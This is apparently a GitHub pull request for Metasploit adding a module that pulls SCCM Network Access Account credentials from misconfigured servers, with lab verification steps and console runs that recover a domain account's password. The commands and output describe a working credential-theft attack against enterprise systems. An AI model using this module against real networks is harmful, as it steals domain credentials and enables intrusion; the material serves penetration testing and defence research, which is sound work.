Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

NAA creds from SCCM #19712

Draft
wants to merge 16 commits into
base: master
Choose a base branch
from
Draft

NAA creds from SCCM #19712

wants to merge 16 commits into from

Conversation

smashery
Copy link
Contributor

This implements retrieval of NAA creds from an SCCM server. Given a computer name and password (which can typically be created by a standard AD domain user), a misconfigured system will just give out

Depends on rapid7/rex-mime#5 and lemontree55/rasn1#40

The main limitation of this work to date is that I've only been able to test on one SCCM server. I'm aware that different crypto schemes are in use, so for now I've given clear error messages in those cases.

Verification

I set up a test environment using GOAD.

  • Start msfconsole
  • Create a new computer account using the samr_computer (soon samr_account) module.
  • use auxiliary/admin/sccm/get_naa_creds
  • Run the module with the rhost set to the Domain Controller, with valid domain creds (low priv should be fine), and the computer creds you just optained.
  • Verify that it successfully gets NAA creds
  • Run it again, setting MANAGEMENT_POINT and SITE_CODE to the values that the module found on the first run (and no rhost)
  • Verify that it successfully gets NAA creds without connecting to LDAP for autodiscovery

Demo

Autodiscovery:

msf6 auxiliary(admin/sccm/get_naa_creds) > run rhost=192.168.33.10 username=eve domain=sccm.lab password=iloveyou computer_user=DESKTOP-BXGIS9UE$ computer_pass=lkUEdeMQinNvgJ7mPV2787Cnf7lhQQio
[*] Running module against 192.168.33.10

[*] Discovering base DN automatically
[*] 192.168.33.10:389 Discovered base DN: DC=sccm,DC=lab
[+] Found Management Point: MECM.sccm.lab (Site code: P01)
[*] Got SMS ID: 2088712A-B957-43F1-B62E-E516A050D6F7
[*] Waiting 5 seconds for SCCM DB to update...
[*] Got NAA Policy URL: http://<mp>/SMS_MP/.sms_pol?{c48754cc-090c-4c56-ba3d-532b5ce5e8a5}.2_00
[+] Found valid NAA creds: sccm.lab\sccm-naa:123456789
[*] Auxiliary module execution completed

Explicit Management Point/Site Code:

msf6 auxiliary(admin/sccm/get_naa_creds) > run management_point=MECM.sccm.lab computer_user=DESKTOP-BXGIS9UE$ computer_pass=lkUEdeMQinNvgJ7mPV2787Cnf7lhQQio site_code=P01

[*] Got SMS ID: 2088712A-B957-43F1-B62E-E516A050D6F7
[*] Waiting 5 seconds for SCCM DB to update...
[*] Got NAA Policy URL: http://<mp>/SMS_MP/.sms_pol?{c48754cc-090c-4c56-ba3d-532b5ce5e8a5}.2_00
[+] Found valid NAA creds: sccm.lab\sccm-naa:123456789
[*] Auxiliary module execution completed

@smashery smashery changed the title Naa creds NAA creds from SCCM Dec 10, 2024
@smashery
Copy link
Contributor Author

Once accepted, we should neaten up some of the duplicate structures in the PKINIT code (which are also CMS). I've kept that task separate for now.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

3 participants